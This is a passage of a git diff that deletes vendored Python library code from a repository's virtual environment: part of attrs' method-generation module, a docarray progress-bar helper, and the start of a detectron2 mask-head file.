-_attrs = attrs -""" -Internal alias so we can use it in functions that take an argument called -*attrs*. -""" - - -def _has_frozen_base_class(cls): - """ - Check whether *cls* has a frozen ancestor by looking at its - __setattr__. - """ - return cls.__setattr__ is _frozen_setattrs - - -def _generate_unique_filename(cls, func_name): - """ - Create a "filename" suitable for a function being generated. - """ - return ( - f"" - ) - - -def _make_hash(cls, attrs, frozen, cache_hash): - attrs = tuple( - a for a in attrs if a.hash is True or (a.hash is None and a.eq is True) - ) - - tab = " " - - unique_filename = _generate_unique_filename(cls, "hash") - type_hash = hash(unique_filename) - # If eq is custom generated, we need to include the functions in globs - globs = {} - - hash_def = "def __hash__(self" - hash_func = "hash((" - closing_braces = "))" - if not cache_hash: - hash_def += "):" - else: - hash_def += ", *" - - hash_def += ( - ", _cache_wrapper=" - + "__import__('attr._make')._make._CacheHashWrapper):" - ) - hash_func = "_cache_wrapper(" + hash_func - closing_braces += ")" - - method_lines = [hash_def] - - def append_hash_computation_lines(prefix, indent): - """ - Generate the code for actually computing the hash code. - Below this will either be returned directly or used to compute - a value which is then cached, depending on the value of cache_hash - """ - - method_lines.extend( - [ - indent + prefix + hash_func, - indent + f" {type_hash},", - ] - ) - - for a in attrs: - if a.eq_key: - cmp_name = f"_{a.name}_key" - globs[cmp_name] = a.eq_key - method_lines.append( - indent + f" {cmp_name}(self.{a.name})," - ) - else: - method_lines.append(indent + f" self.{a.name},") - - method_lines.append(indent + " " + closing_braces) - - if cache_hash: - method_lines.append(tab + f"if self.{_hash_cache_field} is None:") - if frozen: - append_hash_computation_lines( - f"object.__setattr__(self, '{_hash_cache_field}', ", tab * 2 - ) - method_lines.append(tab * 2 + ")") # close __setattr__ - else: - append_hash_computation_lines( - f"self.{_hash_cache_field} = ", tab * 2 - ) - method_lines.append(tab + f"return self.{_hash_cache_field}") - else: - append_hash_computation_lines("return ", tab) - - script = "\n".join(method_lines) - return _make_method("__hash__", script, unique_filename, globs) - - -def _add_hash(cls, attrs): - """ - Add a hash method to *cls*. - """ - cls.__hash__ = _make_hash(cls, attrs, frozen=False, cache_hash=False) - return cls - - -def _make_ne(): - """ - Create __ne__ method. - """ - - def __ne__(self, other): - """ - Check equality and either forward a NotImplemented or - return the result negated. - """ - result = self.__eq__(other) - if result is NotImplemented: - return NotImplemented - - return not result - - return __ne__ - - -def _make_eq(cls, attrs): - """ - Create __eq__ method for *cls* with *attrs*. - """ - attrs = [a for a in attrs if a.eq] - - unique_filename = _generate_unique_filename(cls, "eq") - lines = [ - "def __eq__(self, other):", - " if other.__class__ is not self.__class__:", - " return NotImplemented", - ] - - # We can't just do a big self.x = other.x and... clause due to - # irregularities like nan == nan is false but (nan,) == (nan,) is true. - globs = {} - if attrs: - lines.append(" return (") - others = [" ) == ("] - for a in attrs: - if a.eq_key: - cmp_name = f"_{a.name}_key" - # Add the key function to the global namespace - # of the evaluated function. - globs[cmp_name] = a.eq_key - lines.append(f" {cmp_name}(self.{a.name}),") - others.append(f" {cmp_name}(other.{a.name}),") - else: - lines.append(f" self.{a.name},") - others.append(f" other.{a.name},") - - lines += others + [" )"] - else: - lines.append(" return True") - - script = "\n".join(lines) - - return _make_method("__eq__", script, unique_filename, globs) - - -def _make_order(cls, attrs): - """ - Create ordering methods for *cls* with *attrs*. - """ - attrs = [a for a in attrs if a.order] - - def attrs_to_tuple(obj): - """ - Save us some typing. - """ - return tuple( - key(value) if key else value - for value, key in ( - (getattr(obj, a.name), a.order_key) for a in attrs - ) - ) - - def __lt__(self, other): - """ - Automatically created by attrs. - """ - if other.__class__ is self.__class__: - return attrs_to_tuple(self) < attrs_to_tuple(other) - - return NotImplemented - - def __le__(self, other): - """ - Automatically created by attrs. - """ - if other.__class__ is self.__class__: - return attrs_to_tuple(self) <= attrs_to_tuple(other) - - return NotImplemented - - def __gt__(self, other): - """ - Automatically created by attrs. - """ - if other.__class__ is self.__class__: - return attrs_to_tuple(self) > attrs_to_tuple(other) - - return NotImplemented - - def __ge__(self, other): - """ - Automatically created by attrs. - """ - if other.__class__ is self.__class__: - return attrs_to_tuple(self) >= attrs_to_tuple(other) - - return NotImplemented - - return __lt__, __le__, __gt__, __ge__ - - -def _add_eq(cls, attrs=None): - """ - Add equality methods to *cls* with *attrs*. - """ - if attrs is None: - attrs = cls.__attrs_attrs__ - - cls.__eq__ = _make_eq(cls, attrs) - cls.__ne__ = _make_ne() - - return cls - - -def _make_repr(attrs, ns, cls): - unique_filename = _generate_unique_filename(cls, "repr") - # Figure out which attributes to include, and which function to use to - # format them. The a.repr value can be either bool or a custom - # callable. - attr_names_with_reprs = tuple( - (a.name, (repr if a.repr is True else a.repr), a.init) - for a in attrs - if a.repr is not False - ) - globs = { - name + "_repr": r for name, r, _ in attr_names_with_reprs if r != repr - } - globs["_compat"] = _compat - globs["AttributeError"] = AttributeError - globs["NOTHING"] = NOTHING - attribute_fragments = [] - for name, r, i in attr_names_with_reprs: - accessor = ( - "self." + name if i else 'getattr(self, "' + name + '", NOTHING)' - ) - fragment = ( - "%s={%s!r}" % (name, accessor) - if r == repr - else "%s={%s_repr(%s)}" % (name, name, accessor) - ) - attribute_fragments.append(fragment) - repr_fragment = ", ".join(attribute_fragments) - - if ns is None: - cls_name_fragment = '{self.__class__.__qualname__.rsplit(">.", 1)[-1]}' - else: - cls_name_fragment = ns + ".{self.__class__.__name__}" - - lines = [ - "def __repr__(self):", - " try:", - " already_repring = _compat.repr_context.already_repring", - " except AttributeError:", - " already_repring = {id(self),}", - " _compat.repr_context.already_repring = already_repring", - " else:", - " if id(self) in already_repring:", - " return '...'", - " else:", - " already_repring.add(id(self))", - " try:", - f" return f'{cls_name_fragment}({repr_fragment})'", - " finally:", - " already_repring.remove(id(self))", - ] - - return _make_method( - "__repr__", "\n".join(lines), unique_filename, globs=globs - ) - - -def _add_repr(cls, ns=None, attrs=None): - """ - Add a repr method to *cls*. - """ - if attrs is None: - attrs = cls.__attrs_attrs__ - - cls.__repr__ = _make_repr(attrs, ns, cls) - return cls - - -def fields(cls): - """ - Return the tuple of *attrs* attributes for a class. - - The tuple also allows accessing the fields by their names (see below for - examples). - - :param type cls: Class to introspect. - - :raise TypeError: If *cls* is not a class. - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - :rtype: tuple (with name accessors) of `attrs.Attribute` - - .. versionchanged:: 16.2.0 Returned tuple allows accessing the fields - by name. - .. versionchanged:: 23.1.0 Add support for generic classes. - """ - generic_base = get_generic_base(cls) - - if generic_base is None and not isinstance(cls, type): - raise TypeError("Passed object must be a class.") - - attrs = getattr(cls, "__attrs_attrs__", None) - - if attrs is None: - if generic_base is not None: - attrs = getattr(generic_base, "__attrs_attrs__", None) - if attrs is not None: - # Even though this is global state, stick it on here to speed - # it up. We rely on `cls` being cached for this to be - # efficient. - cls.__attrs_attrs__ = attrs - return attrs - raise NotAnAttrsClassError(f"{cls!r} is not an attrs-decorated class.") - - return attrs - - -def fields_dict(cls): - """ - Return an ordered dictionary of *attrs* attributes for a class, whose - keys are the attribute names. - - :param type cls: Class to introspect. - - :raise TypeError: If *cls* is not a class. - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - :rtype: dict - - .. versionadded:: 18.1.0 - """ - if not isinstance(cls, type): - raise TypeError("Passed object must be a class.") - attrs = getattr(cls, "__attrs_attrs__", None) - if attrs is None: - raise NotAnAttrsClassError(f"{cls!r} is not an attrs-decorated class.") - return {a.name: a for a in attrs} - - -def validate(inst): - """ - Validate all attributes on *inst* that have a validator. - - Leaves all exceptions through. - - :param inst: Instance of a class with *attrs* attributes. - """ - if _config._run_validators is False: - return - - for a in fields(inst.__class__): - v = a.validator - if v is not None: - v(inst, a, getattr(inst, a.name)) - - -def _is_slot_cls(cls): - return "__slots__" in cls.__dict__ - - -def _is_slot_attr(a_name, base_attr_map): - """ - Check if the attribute name comes from a slot class. - """ - return a_name in base_attr_map and _is_slot_cls(base_attr_map[a_name]) - - -def _make_init( - cls, - attrs, - pre_init, - post_init, - frozen, - slots, - cache_hash, - base_attr_map, - is_exc, - cls_on_setattr, - attrs_init, -): - has_cls_on_setattr = ( - cls_on_setattr is not None and cls_on_setattr is not setters.NO_OP - ) - - if frozen and has_cls_on_setattr: - raise ValueError("Frozen classes can't use on_setattr.") - - needs_cached_setattr = cache_hash or frozen - filtered_attrs = [] - attr_dict = {} - for a in attrs: - if not a.init and a.default is NOTHING: - continue - - filtered_attrs.append(a) - attr_dict[a.name] = a - - if a.on_setattr is not None: - if frozen is True: - raise ValueError("Frozen classes can't use on_setattr.") - - needs_cached_setattr = True - elif has_cls_on_setattr and a.on_setattr is not setters.NO_OP: - needs_cached_setattr = True - - unique_filename = _generate_unique_filename(cls, "init") - - script, globs, annotations = _attrs_to_init_script( - filtered_attrs, - frozen, - slots, - pre_init, - post_init, - cache_hash, - base_attr_map, - is_exc, - needs_cached_setattr, - has_cls_on_setattr, - attrs_init, - ) - if cls.__module__ in sys.modules: - # This makes typing.get_type_hints(CLS.__init__) resolve string types. - globs.update(sys.modules[cls.__module__].__dict__) - - globs.update({"NOTHING": NOTHING, "attr_dict": attr_dict}) - - if needs_cached_setattr: - # Save the lookup overhead in __init__ if we need to circumvent - # setattr hooks. - globs["_cached_setattr_get"] = _obj_setattr.__get__ - - init = _make_method( - "__attrs_init__" if attrs_init else "__init__", - script, - unique_filename, - globs, - ) - init.__annotations__ = annotations - - return init - - -def _setattr(attr_name, value_var, has_on_setattr): - """ - Use the cached object.setattr to set *attr_name* to *value_var*. - """ - return f"_setattr('{attr_name}', {value_var})" - - -def _setattr_with_converter(attr_name, value_var, has_on_setattr): - """ - Use the cached object.setattr to set *attr_name* to *value_var*, but run - its converter first. - """ - return "_setattr('%s', %s(%s))" % ( - attr_name, - _init_converter_pat % (attr_name,), - value_var, - ) - - -def _assign(attr_name, value, has_on_setattr): - """ - Unless *attr_name* has an on_setattr hook, use normal assignment. Otherwise - relegate to _setattr. - """ - if has_on_setattr: - return _setattr(attr_name, value, True) - - return f"self.{attr_name} = {value}" - - -def _assign_with_converter(attr_name, value_var, has_on_setattr): - """ - Unless *attr_name* has an on_setattr hook, use normal assignment after - conversion. Otherwise relegate to _setattr_with_converter. - """ - if has_on_setattr: - return _setattr_with_converter(attr_name, value_var, True) - - return "self.%s = %s(%s)" % ( - attr_name, - _init_converter_pat % (attr_name,), - value_var, - ) - - -def _attrs_to_init_script( - attrs, - frozen, - slots, - pre_init, - post_init, - cache_hash, - base_attr_map, - is_exc, - needs_cached_setattr, - has_cls_on_setattr, - attrs_init, -): - """ - Return a script of an initializer for *attrs* and a dict of globals. - - The globals are expected by the generated script. - - If *frozen* is True, we cannot set the attributes directly so we use - a cached ``object.__setattr__``. - """ - lines = [] - if pre_init: - lines.append("self.__attrs_pre_init__()") - - if needs_cached_setattr: - lines.append( - # Circumvent the __setattr__ descriptor to save one lookup per - # assignment. - # Note _setattr will be used again below if cache_hash is True - "_setattr = _cached_setattr_get(self)" - ) - - if frozen is True: - if slots is True: - fmt_setter = _setattr - fmt_setter_with_converter = _setattr_with_converter - else: - # Dict frozen classes assign directly to __dict__. - # But only if the attribute doesn't come from an ancestor slot - # class. - # Note _inst_dict will be used again below if cache_hash is True - lines.append("_inst_dict = self.__dict__") - - def fmt_setter(attr_name, value_var, has_on_setattr): - if _is_slot_attr(attr_name, base_attr_map): - return _setattr(attr_name, value_var, has_on_setattr) - - return f"_inst_dict['{attr_name}'] = {value_var}" - - def fmt_setter_with_converter( - attr_name, value_var, has_on_setattr - ): - if has_on_setattr or _is_slot_attr(attr_name, base_attr_map): - return _setattr_with_converter( - attr_name, value_var, has_on_setattr - ) - - return "_inst_dict['%s'] = %s(%s)" % ( - attr_name, - _init_converter_pat % (attr_name,), - value_var, - ) - - else: - # Not frozen. - fmt_setter = _assign - fmt_setter_with_converter = _assign_with_converter - - args = [] - kw_only_args = [] - attrs_to_validate = [] - - # This is a dictionary of names to validator and converter callables. - # Injecting this into __init__ globals lets us avoid lookups. - names_for_globals = {} - annotations = {"return": None} - - for a in attrs: - if a.validator: - attrs_to_validate.append(a) - - attr_name = a.name - has_on_setattr = a.on_setattr is not None or ( - a.on_setattr is not setters.NO_OP and has_cls_on_setattr - ) - # a.alias is set to maybe-mangled attr_name in _ClassBuilder if not - # explicitly provided - arg_name = a.alias - - has_factory = isinstance(a.default, Factory) - if has_factory and a.default.takes_self: - maybe_self = "self" - else: - maybe_self = "" - - if a.init is False: - if has_factory: - init_factory_name = _init_factory_pat % (a.name,) - if a.converter is not None: - lines.append( - fmt_setter_with_converter( - attr_name, - init_factory_name + f"({maybe_self})", - has_on_setattr, - ) - ) - conv_name = _init_converter_pat % (a.name,) - names_for_globals[conv_name] = a.converter - else: - lines.append( - fmt_setter( - attr_name, - init_factory_name + f"({maybe_self})", - has_on_setattr, - ) - ) - names_for_globals[init_factory_name] = a.default.factory - else: - if a.converter is not None: - lines.append( - fmt_setter_with_converter( - attr_name, - f"attr_dict['{attr_name}'].default", - has_on_setattr, - ) - ) - conv_name = _init_converter_pat % (a.name,) - names_for_globals[conv_name] = a.converter - else: - lines.append( - fmt_setter( - attr_name, - f"attr_dict['{attr_name}'].default", - has_on_setattr, - ) - ) - elif a.default is not NOTHING and not has_factory: - arg = f"{arg_name}=attr_dict['{attr_name}'].default" - if a.kw_only: - kw_only_args.append(arg) - else: - args.append(arg) - - if a.converter is not None: - lines.append( - fmt_setter_with_converter( - attr_name, arg_name, has_on_setattr - ) - ) - names_for_globals[ - _init_converter_pat % (a.name,) - ] = a.converter - else: - lines.append(fmt_setter(attr_name, arg_name, has_on_setattr)) - - elif has_factory: - arg = f"{arg_name}=NOTHING" - if a.kw_only: - kw_only_args.append(arg) - else: - args.append(arg) - lines.append(f"if {arg_name} is not NOTHING:") - - init_factory_name = _init_factory_pat % (a.name,) - if a.converter is not None: - lines.append( - " " - + fmt_setter_with_converter( - attr_name, arg_name, has_on_setattr - ) - ) - lines.append("else:") - lines.append( - " " - + fmt_setter_with_converter( - attr_name, - init_factory_name + "(" + maybe_self + ")", - has_on_setattr, - ) - ) - names_for_globals[ - _init_converter_pat % (a.name,) - ] = a.converter - else: - lines.append( - " " + fmt_setter(attr_name, arg_name, has_on_setattr) - ) - lines.append("else:") - lines.append( - " " - + fmt_setter( - attr_name, - init_factory_name + "(" + maybe_self + ")", - has_on_setattr, - ) - ) - names_for_globals[init_factory_name] = a.default.factory - else: - if a.kw_only: - kw_only_args.append(arg_name) - else: - args.append(arg_name) - - if a.converter is not None: - lines.append( - fmt_setter_with_converter( - attr_name, arg_name, has_on_setattr - ) - ) - names_for_globals[ - _init_converter_pat % (a.name,) - ] = a.converter - else: - lines.append(fmt_setter(attr_name, arg_name, has_on_setattr)) - - if a.init is True: - if a.type is not None and a.converter is None: - annotations[arg_name] = a.type - elif a.converter is not None: - # Try to get the type from the converter. - t = _AnnotationExtractor(a.converter).get_first_param_type() - if t: - annotations[arg_name] = t - - if attrs_to_validate: # we can skip this if there are no validators. - names_for_globals["_config"] = _config - lines.append("if _config._run_validators is True:") - for a in attrs_to_validate: - val_name = "__attr_validator_" + a.name - attr_name = "__attr_" + a.name - lines.append(f" {val_name}(self, {attr_name}, self.{a.name})") - names_for_globals[val_name] = a.validator - names_for_globals[attr_name] = a - - if post_init: - lines.append("self.__attrs_post_init__()") - - # because this is set only after __attrs_post_init__ is called, a crash - # will result if post-init tries to access the hash code. This seemed - # preferable to setting this beforehand, in which case alteration to - # field values during post-init combined with post-init accessing the - # hash code would result in silent bugs. - if cache_hash: - if frozen: - if slots: - # if frozen and slots, then _setattr defined above - init_hash_cache = "_setattr('%s', %s)" - else: - # if frozen and not slots, then _inst_dict defined above - init_hash_cache = "_inst_dict['%s'] = %s" - else: - init_hash_cache = "self.%s = %s" - lines.append(init_hash_cache % (_hash_cache_field, "None")) - - # For exceptions we rely on BaseException.__init__ for proper - # initialization. - if is_exc: - vals = ",".join(f"self.{a.name}" for a in attrs if a.init) - - lines.append(f"BaseException.__init__(self, {vals})") - - args = ", ".join(args) - if kw_only_args: - args += "%s*, %s" % ( - ", " if args else "", # leading comma - ", ".join(kw_only_args), # kw_only args - ) - - return ( - "def %s(self, %s):\n %s\n" - % ( - ("__attrs_init__" if attrs_init else "__init__"), - args, - "\n ".join(lines) if lines else "pass", - ), - names_for_globals, - annotations, - ) - - -def _default_init_alias_for(name: str) -> str: - """ - The default __init__ parameter name for a field. - - This performs private-name adjustment via leading-unscore stripping, - and is the default value of Attribute.alias if not provided. - """ - - return name.lstrip("_") - - -class Attribute: - """ - *Read-only* representation of an attribute. - - .. warning:: - - You should never instantiate this class yourself. - - The class has *all* arguments of `attr.ib` (except for ``factory`` - which is only syntactic sugar for ``default=Factory(...)`` plus the - following: - - - ``name`` (`str`): The name of the attribute. - - ``alias`` (`str`): The __init__ parameter name of the attribute, after - any explicit overrides and default private-attribute-name handling. - - ``inherited`` (`bool`): Whether or not that attribute has been inherited - from a base class. - - ``eq_key`` and ``order_key`` (`typing.Callable` or `None`): The callables - that are used for comparing and ordering objects by this attribute, - respectively. These are set by passing a callable to `attr.ib`'s ``eq``, - ``order``, or ``cmp`` arguments. See also :ref:`comparison customization - `. - - Instances of this class are frequently used for introspection purposes - like: - - - `fields` returns a tuple of them. - - Validators get them passed as the first argument. - - The :ref:`field transformer ` hook receives a list of - them. - - The ``alias`` property exposes the __init__ parameter name of the field, - with any overrides and default private-attribute handling applied. - - - .. versionadded:: 20.1.0 *inherited* - .. versionadded:: 20.1.0 *on_setattr* - .. versionchanged:: 20.2.0 *inherited* is not taken into account for - equality checks and hashing anymore. - .. versionadded:: 21.1.0 *eq_key* and *order_key* - .. versionadded:: 22.2.0 *alias* - - For the full version history of the fields, see `attr.ib`. - """ - - __slots__ = ( - "name", - "default", - "validator", - "repr", - "eq", - "eq_key", - "order", - "order_key", - "hash", - "init", - "metadata", - "type", - "converter", - "kw_only", - "inherited", - "on_setattr", - "alias", - ) - - def __init__( - self, - name, - default, - validator, - repr, - cmp, # XXX: unused, remove along with other cmp code. - hash, - init, - inherited, - metadata=None, - type=None, - converter=None, - kw_only=False, - eq=None, - eq_key=None, - order=None, - order_key=None, - on_setattr=None, - alias=None, - ): - eq, eq_key, order, order_key = _determine_attrib_eq_order( - cmp, eq_key or eq, order_key or order, True - ) - - # Cache this descriptor here to speed things up later. - bound_setattr = _obj_setattr.__get__(self) - - # Despite the big red warning, people *do* instantiate `Attribute` - # themselves. - bound_setattr("name", name) - bound_setattr("default", default) - bound_setattr("validator", validator) - bound_setattr("repr", repr) - bound_setattr("eq", eq) - bound_setattr("eq_key", eq_key) - bound_setattr("order", order) - bound_setattr("order_key", order_key) - bound_setattr("hash", hash) - bound_setattr("init", init) - bound_setattr("converter", converter) - bound_setattr( - "metadata", - ( - types.MappingProxyType(dict(metadata)) # Shallow copy - if metadata - else _empty_metadata_singleton - ), - ) - bound_setattr("type", type) - bound_setattr("kw_only", kw_only) - bound_setattr("inherited", inherited) - bound_setattr("on_setattr", on_setattr) - bound_setattr("alias", alias) - - def __setattr__(self, name, value): - raise FrozenInstanceError() - - @classmethod - def from_counting_attr(cls, name, ca, type=None): - # type holds the annotated value. deal with conflicts: - if type is None: - type = ca.type - elif ca.type is not None: - raise ValueError( - "Type annotation and type argument cannot both be present" - ) - inst_dict = { - k: getattr(ca, k) - for k in Attribute.__slots__ - if k - not in ( - "name", - "validator", - "default", - "type", - "inherited", - ) # exclude methods and deprecated alias - } - return cls( - name=name, - validator=ca._validator, - default=ca._default, - type=type, - cmp=None, - inherited=False, - **inst_dict, - ) - - # Don't use attrs.evolve since fields(Attribute) doesn't work - def evolve(self, **changes): - """ - Copy *self* and apply *changes*. - - This works similarly to `attrs.evolve` but that function does not work - with `Attribute`. - - It is mainly meant to be used for `transform-fields`. - - .. versionadded:: 20.3.0 - """ - new = copy.copy(self) - - new._setattrs(changes.items()) - - return new - - # Don't use _add_pickle since fields(Attribute) doesn't work - def __getstate__(self): - """ - Play nice with pickle. - """ - return tuple( - getattr(self, name) if name != "metadata" else dict(self.metadata) - for name in self.__slots__ - ) - - def __setstate__(self, state): - """ - Play nice with pickle. - """ - self._setattrs(zip(self.__slots__, state)) - - def _setattrs(self, name_values_pairs): - bound_setattr = _obj_setattr.__get__(self) - for name, value in name_values_pairs: - if name != "metadata": - bound_setattr(name, value) - else: - bound_setattr( - name, - types.MappingProxyType(dict(value)) - if value - else _empty_metadata_singleton, - ) - - -_a = [ - Attribute( - name=name, - default=NOTHING, - validator=None, - repr=True, - cmp=None, - eq=True, - order=False, - hash=(name != "metadata"), - init=True, - inherited=False, - alias=_default_init_alias_for(name), - ) - for name in Attribute.__slots__ -] - -Attribute = _add_hash( - _add_eq( - _add_repr(Attribute, attrs=_a), - attrs=[a for a in _a if a.name != "inherited"], - ), - attrs=[a for a in _a if a.hash and a.name != "inherited"], -) - - -class _CountingAttr: - """ - Intermediate representation of attributes that uses a counter to preserve - the order in which the attributes have been defined. - - *Internal* data structure of the attrs library. Running into is most - likely the result of a bug like a forgotten `@attr.s` decorator. - """ - - __slots__ = ( - "counter", - "_default", - "repr", - "eq", - "eq_key", - "order", - "order_key", - "hash", - "init", - "metadata", - "_validator", - "converter", - "type", - "kw_only", - "on_setattr", - "alias", - ) - __attrs_attrs__ = tuple( - Attribute( - name=name, - alias=_default_init_alias_for(name), - default=NOTHING, - validator=None, - repr=True, - cmp=None, - hash=True, - init=True, - kw_only=False, - eq=True, - eq_key=None, - order=False, - order_key=None, - inherited=False, - on_setattr=None, - ) - for name in ( - "counter", - "_default", - "repr", - "eq", - "order", - "hash", - "init", - "on_setattr", - "alias", - ) - ) + ( - Attribute( - name="metadata", - alias="metadata", - default=None, - validator=None, - repr=True, - cmp=None, - hash=False, - init=True, - kw_only=False, - eq=True, - eq_key=None, - order=False, - order_key=None, - inherited=False, - on_setattr=None, - ), - ) - cls_counter = 0 - - def __init__( - self, - default, - validator, - repr, - cmp, - hash, - init, - converter, - metadata, - type, - kw_only, - eq, - eq_key, - order, - order_key, - on_setattr, - alias, - ): - _CountingAttr.cls_counter += 1 - self.counter = _CountingAttr.cls_counter - self._default = default - self._validator = validator - self.converter = converter - self.repr = repr - self.eq = eq - self.eq_key = eq_key - self.order = order - self.order_key = order_key - self.hash = hash - self.init = init - self.metadata = metadata - self.type = type - self.kw_only = kw_only - self.on_setattr = on_setattr - self.alias = alias - - def validator(self, meth): - """ - Decorator that adds *meth* to the list of validators. - - Returns *meth* unchanged. - - .. versionadded:: 17.1.0 - """ - if self._validator is None: - self._validator = meth - else: - self._validator = and_(self._validator, meth) - return meth - - def default(self, meth): - """ - Decorator that allows to set the default for an attribute. - - Returns *meth* unchanged. - - :raises DefaultAlreadySetError: If default has been set before. - - .. versionadded:: 17.1.0 - """ - if self._default is not NOTHING: - raise DefaultAlreadySetError() - - self._default = Factory(meth, takes_self=True) - - return meth - - -_CountingAttr = _add_eq(_add_repr(_CountingAttr)) - - -class Factory: - """ - Stores a factory callable. - - If passed as the default value to `attrs.field`, the factory is used to - generate a new value. - - :param callable factory: A callable that takes either none or exactly one - mandatory positional argument depending on *takes_self*. - :param bool takes_self: Pass the partially initialized instance that is - being initialized as a positional argument. - - .. versionadded:: 17.1.0 *takes_self* - """ - - __slots__ = ("factory", "takes_self") - - def __init__(self, factory, takes_self=False): - self.factory = factory - self.takes_self = takes_self - - def __getstate__(self): - """ - Play nice with pickle. - """ - return tuple(getattr(self, name) for name in self.__slots__) - - def __setstate__(self, state): - """ - Play nice with pickle. - """ - for name, value in zip(self.__slots__, state): - setattr(self, name, value) - - -_f = [ - Attribute( - name=name, - default=NOTHING, - validator=None, - repr=True, - cmp=None, - eq=True, - order=False, - hash=True, - init=True, - inherited=False, - ) - for name in Factory.__slots__ -] - -Factory = _add_hash(_add_eq(_add_repr(Factory, attrs=_f), attrs=_f), attrs=_f) - - -def make_class(name, attrs, bases=(object,), **attributes_arguments): - r""" - A quick way to create a new class called *name* with *attrs*. - - :param str name: The name for the new class. - - :param attrs: A list of names or a dictionary of mappings of names to - `attr.ib`\ s / `attrs.field`\ s. - - The order is deduced from the order of the names or attributes inside - *attrs*. Otherwise the order of the definition of the attributes is - used. - :type attrs: `list` or `dict` - - :param tuple bases: Classes that the new class will subclass. - - :param attributes_arguments: Passed unmodified to `attr.s`. - - :return: A new class with *attrs*. - :rtype: type - - .. versionadded:: 17.1.0 *bases* - .. versionchanged:: 18.1.0 If *attrs* is ordered, the order is retained. - """ - if isinstance(attrs, dict): - cls_dict = attrs - elif isinstance(attrs, (list, tuple)): - cls_dict = {a: attrib() for a in attrs} - else: - raise TypeError("attrs argument must be a dict or a list.") - - pre_init = cls_dict.pop("__attrs_pre_init__", None) - post_init = cls_dict.pop("__attrs_post_init__", None) - user_init = cls_dict.pop("__init__", None) - - body = {} - if pre_init is not None: - body["__attrs_pre_init__"] = pre_init - if post_init is not None: - body["__attrs_post_init__"] = post_init - if user_init is not None: - body["__init__"] = user_init - - type_ = types.new_class(name, bases, {}, lambda ns: ns.update(body)) - - # For pickling to work, the __module__ variable needs to be set to the - # frame where the class is created. Bypass this step in environments where - # sys._getframe is not defined (Jython for example) or sys._getframe is not - # defined for arguments greater than 0 (IronPython). - try: - type_.__module__ = sys._getframe(1).f_globals.get( - "__name__", "__main__" - ) - except (AttributeError, ValueError): - pass - - # We do it here for proper warnings with meaningful stacklevel. - cmp = attributes_arguments.pop("cmp", None) - ( - attributes_arguments["eq"], - attributes_arguments["order"], - ) = _determine_attrs_eq_order( - cmp, - attributes_arguments.get("eq"), - attributes_arguments.get("order"), - True, - ) - - return _attrs(these=cls_dict, **attributes_arguments)(type_) - - -# These are required by within this module so we define them here and merely -# import into .validators / .converters. - - -@attrs(slots=True, hash=True) -class _AndValidator: - """ - Compose many validators to a single one. - """ - - _validators = attrib() - - def __call__(self, inst, attr, value): - for v in self._validators: - v(inst, attr, value) - - -def and_(*validators): - """ - A validator that composes multiple validators into one. - - When called on a value, it runs all wrapped validators. - - :param callables validators: Arbitrary number of validators. - - .. versionadded:: 17.1.0 - """ - vals = [] - for validator in validators: - vals.extend( - validator._validators - if isinstance(validator, _AndValidator) - else [validator] - ) - - return _AndValidator(tuple(vals)) - - -def pipe(*converters): - """ - A converter that composes multiple converters into one. - - When called on a value, it runs all wrapped converters, returning the - *last* value. - - Type annotations will be inferred from the wrapped converters', if - they have any. - - :param callables converters: Arbitrary number of converters. - - .. versionadded:: 20.1.0 - """ - - def pipe_converter(val): - for converter in converters: - val = converter(val) - - return val - - if not converters: - # If the converter list is empty, pipe_converter is the identity. - A = typing.TypeVar("A") - pipe_converter.__annotations__ = {"val": A, "return": A} - else: - # Get parameter type from first converter. - t = _AnnotationExtractor(converters[0]).get_first_param_type() - if t: - pipe_converter.__annotations__["val"] = t - - # Get return type from last converter. - rt = _AnnotationExtractor(converters[-1]).get_return_type() - if rt: - pipe_converter.__annotations__["return"] = rt - - return pipe_converter diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/docarray/utils/_internal/progress_bar.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/docarray/utils/_internal/progress_bar.py deleted file mode 100644 index 4750c509a1ade968e72c61785dd12130a03be1f2..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/docarray/utils/_internal/progress_bar.py +++ /dev/null @@ -1,58 +0,0 @@ -from typing import Optional - -from rich.progress import ( - BarColumn, - MofNCompleteColumn, - Progress, - SpinnerColumn, - Text, - TextColumn, - TimeElapsedColumn, - TimeRemainingColumn, -) - - -class _QPSColumn(TextColumn): - def render(self, task) -> Text: - if task.speed: - _text = f'{task.speed:.0f} QPS' - else: - _text = 'unknown' - if self.markup: - text = Text.from_markup(_text, style=self.style, justify=self.justify) - else: - text = Text(_text, style=self.style, justify=self.justify) - if self.highlighter: - self.highlighter.highlight(text) - return text - - -def _get_pbar(disable: bool, total: Optional[int] = None): - columns = ( - SpinnerColumn(), - TextColumn('[bold]{task.description}'), - BarColumn(), - MofNCompleteColumn(), - '•', - _QPSColumn('{task.speed} QPS', justify='right', style='progress.data.speed'), - '•', - TimeRemainingColumn() if total else TimeElapsedColumn(), - '•', - TextColumn( - '[bold blue]{task.fields[total_size]}', - justify='right', - style='progress.filesize', - ), - ) - - return Progress( - *columns, - transient=False, - disable=disable, - ) - - -def _get_progressbar(description: str, disable: bool, total: Optional[int]): - progress = _get_pbar(disable, total) - task = progress.add_task(description, total=total, start=False, total_size=0) - return progress, task diff --git a/spaces/Superlang/ImageProcessor/annotator/oneformer/detectron2/modeling/roi_heads/mask_head.py b/spaces/Superlang/ImageProcessor/annotator/oneformer/detectron2/modeling/roi_heads/mask_head.py deleted file mode 100644 index 1b5465e413195aa21733157af4e1ae3a2b897e7c..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/oneformer/detectron2/modeling/roi_heads/mask_head.py +++ /dev/null @@ -1,298 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -from typing import List -import fvcore.nn.weight_init as weight_init -import torch -from torch import nn -from torch.nn import functional as F - -from annotator.oneformer.detectron2.config import configurable -from annotator.oneformer.detectron2.layers import Conv2d, ConvTranspose2d, ShapeSpec, cat, get_norm -from annotator.oneformer.detectron2.layers.wrappers import move_device_like -from annotator.oneformer.detectron2.structures import Instances -from annotator.oneformer.detectron2.utils.events import get_event_storage -from annotator.oneformer.detectron2.utils.registry import Registry - -__all__ = [ - "BaseMaskRCNNHead", - "MaskRCNNConvUpsampleHead", - "build_mask_head", - "ROI_MASK_HEAD_REGISTRY", -] - - -ROI_MASK_HEAD_REGISTRY = 